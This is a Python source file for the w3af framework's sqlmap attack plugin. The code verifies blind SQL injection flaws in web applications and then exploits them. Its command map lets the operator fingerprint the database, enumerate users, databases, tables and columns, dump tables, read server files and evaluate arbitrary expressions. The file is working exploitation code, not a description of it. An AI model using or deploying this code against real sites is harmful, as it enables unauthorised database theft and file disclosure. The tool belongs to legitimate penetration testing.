''' sqlmap.py Copyright 2006 Andres Riancho This file is part of w3af, w3af.sourceforge.net . w3af is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. w3af is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with w3af; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA ''' import core.data.request.httpPostDataRequest as httpPostDataRequest import core.data.request.httpQsRequest as httpQsRequest import core.controllers.outputManager as om from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin import core.data.kb.knowledgeBase as kb import core.data.kb.vuln as vuln import core.data.parsers.urlParser as urlParser from core.controllers.w3afException import w3afException from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder from core.controllers.sqlTools.blindSqli import blindSqli as blindSqliTools import pprint SQLMAPCREATORS = 'sqlmap coded by inquis and belch ' class sqlmap(baseAttackPlugin): ''' This plugin exploits [blind] sql injections using sqlmap ( http://sqlmap.sf.net ). ''' ''' Plugin author: @author: Andres Riancho ( andres.riancho@gmail.com ) sqlmap authors: @author: Bernardo Damele (inquis) - maintainer @author: Daniele Bellucci (belch) - initial author ''' def __init__(self): baseAttackPlugin.__init__(self) # Internal variables self._vuln = None self._driver = None # User configured options for fastExploit self._url = None self._method = None self._data = None self._injvar = None # User configured variables self._equalLimit = 0.8 self._equAlgorithm = 'stringEq' self._pprint = pprint.PrettyPrinter(indent=4) def fastExploit( self ): ''' Exploits a web app with [blind] sql injections vulns. The options are configured using the plugin options and setOptions() method. ''' om.out.debug( 'Starting sqlmap fastExploit.' ) om.out.console( SQLMAPCREATORS ) if self._url == None or self._method == None or self._data == None or self._injvar == None: raise w3afException('You have to configure the plugin parameters') else: freq = None if self._method == 'POST': freq = httpPostDataRequest.httpPostDataRequest() elif self._method == 'GET': freq = httpQsRequest.httpQsRequest() else: raise w3afException('Method not supported.') freq.setURL( self._url ) freq.setDc( urlParser.getQueryString( 'http://a/a.txt?' + self._data ) ) freq.setHeaders( {} ) bsql = blindSqliTools() bsql.setUrlOpener( self._urlOpener ) bsql.setEqualLimit( self._equalLimit ) bsql.setEquAlgorithm( self._equAlgorithm ) res = bsql.verifyBlindSQL( freq, self._injvar ) if res == None: raise w3afException('Could not verify sql injection.') else: om.out.console('SQL injection could be verified, trying to create the DB driver.') for vuln in res: if not self._generateShell( vuln ): om.out.console('The vulnerability with id: '+ str( vuln.getId() ) +' could not be exploited.') else: return True raise w3afException('No exploitable vulnerabilities found.') def getType(self): return 'shell' def canExploit( self ): ''' Searches the kb for vulnerabilities that the plugin can exploit. @return: True if plugin knows how to exploit a found vuln. ''' blindSqli = kb.kb.getData( 'blindSqli' , 'blindSqli' ) sqli = kb.kb.getData( 'sqli' , 'sqli' ) if len( blindSqli ) and len( sqli ): return False else: return True def exploit(self ): ''' Exploits a [blind] sql injections vulns that was found and stored in the kb. @return: True if the shell is working and the user can start calling rexec ''' om.out.console( SQLMAPCREATORS ) if not self.canExploit(): om.out.information( 'No [blind] sql injection vulnerabilities have been found.' ) om.out.information( 'Hint #1: Try to find vulnerabilities using the audit plugins.' ) om.out.information( 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.' ) else: vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' ) vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) ) bsql = blindSqliTools() bsql.setUrlOpener( self._urlOpener ) bsql.setEqualLimit( self._equalLimit ) bsql.setEquAlgorithm( self._equAlgorithm ) vulns2 = [] for v in vulns: vulns2.extend( bsql.verifyBlindSQL( v.getMutant().getFuzzableReq(), v.getVar() ) ) vulns = vulns2 for vuln in vulns: # Try to get a shell using all vuln om.out.information('Trying to exploit using vulnerability with id: ' + str( vuln.getId() ) ) if self._generateShell(vuln): # A shell was generated, I only need one point of exec. om.out.information( 'Blind sql successfully exploited. You may start entering commands.' ) else: om.out.information('Failed to exploit using vulnerability with id: ' + str( vuln.getId() ) ) return True def _generateShell( self, vuln ): ''' @parameter vuln: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands. @return: True if sqlmap could fingerprint the database. ''' dbBuilder = dbDriverBuilder( self._urlOpener ) driver = dbBuilder.getDriverForVuln( vuln ) if driver == None: return False else: self._driver = driver return True def rexec( self, command ): ''' This method is called when a command is being sent to the remote server. @parameter command: The command to send ( users, dbs, etc ). @return: The result of the command. ''' _methodMap = {} ### FIXME ! !! ! ! ! ! _methodMap['fingerprint'] = self._driver.getFingerprint _methodMap['banner'] = self._driver.getBanner _methodMap['current-user'] = self._driver.getCurrentUser _methodMap['current-db'] = self._driver.getCurrentDb _methodMap['users'] = self._driver.getUsers _methodMap['dbs'] = self._driver.getDbs _methodMap['tables'] = self._driver.auxGetTables _methodMap['columns'] = self._driver.auxGetColumns _methodMap['dump'] = self._driver.auxDump _methodMap['file'] = self._driver.getFile _methodMap['expression'] = self._driver.getExpr _methodMap['union-check'] = self._driver.unionCheck _methodMap['help'] = self._help args = [] commandList = command.split(' ') if len( commandList ): cmd = commandList[0] method = '' if commandList[0] in _methodMap: method = _methodMap[ cmd ] else: return 'Unknown command. Please read the help: \n' + self._help() for i in commandList[1:]: args.append( i ) args = tuple( args ) #try: res = apply( method, args ) res = self._driver.dump.dump( cmd, args, res ) return res #except TypeError, t: # return 'Invalid number of parameters for command.' #except Exception, e: # return str(e) else: return 'Unknown command. Please read the help: \n' + self._help() def _help( self ): ''' Print the help to the user. ''' res = SQLMAPCREATORS + '''\n fingerprint perform an exaustive database fingerprint banner get database banner current-user get current database user current-db get current database name users get database users dbs get available databases tables [db] get available databases tables (optional: database) columns [db] get table columns (required: table optional: database) dump
[db] dump a database table (required: -T optional: -D) file read a specific file content expression expression to evaluate union-check check for UNION sql injection ''' return res def getOptionsXML(self): ''' This method returns a XML containing the Options that the plugin has. Using this XML the framework will build a window, a menu, or some other input method to retrieve the info from the user. The XML has to validate against the xml schema file located at : w3af/core/ui/userInterface.dtd @return: XML with the plugin options. ''' return '\ \ \ \ \ \ \ \ \ ' def setOptions( self, optionsMap ): ''' This method sets all the options that are configured using the user interface generated by the framework using the result of getOptionsXML(). @parameter optionsMap: A map with the options for the plugin. @return: No value is returned. ''' self._url = urlParser.uri2url( optionsMap['url'] ) if optionsMap['method'] not in ['GET','POST']: raise w3afException('Unknown method.') else: self._method = optionsMap['method'] self._data = optionsMap['data'] self._injvar = optionsMap['injvar'] self._equAlgorithm = optionsMap['equAlgorithm'] self._equalLimit = optionsMap['equalLimit'] def getPluginDeps( self ): ''' @return: A list with the names of the plugins that should be runned before the current one. ''' return [] def getRootProbability( self ): ''' @return: This method returns the probability of getting a root shell using this attack plugin. This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones. This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS return a root shell. ''' return 0.1 def getLongDesc( self ): ''' @return: A DETAILED description of the plugin functions and features. ''' return ''' This plugin exploits [blind] sql injections. The original sqlmap program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of them. Seven configurable parameters exist: - url - method - data - injvar - equAlgorithm - equalLimit '''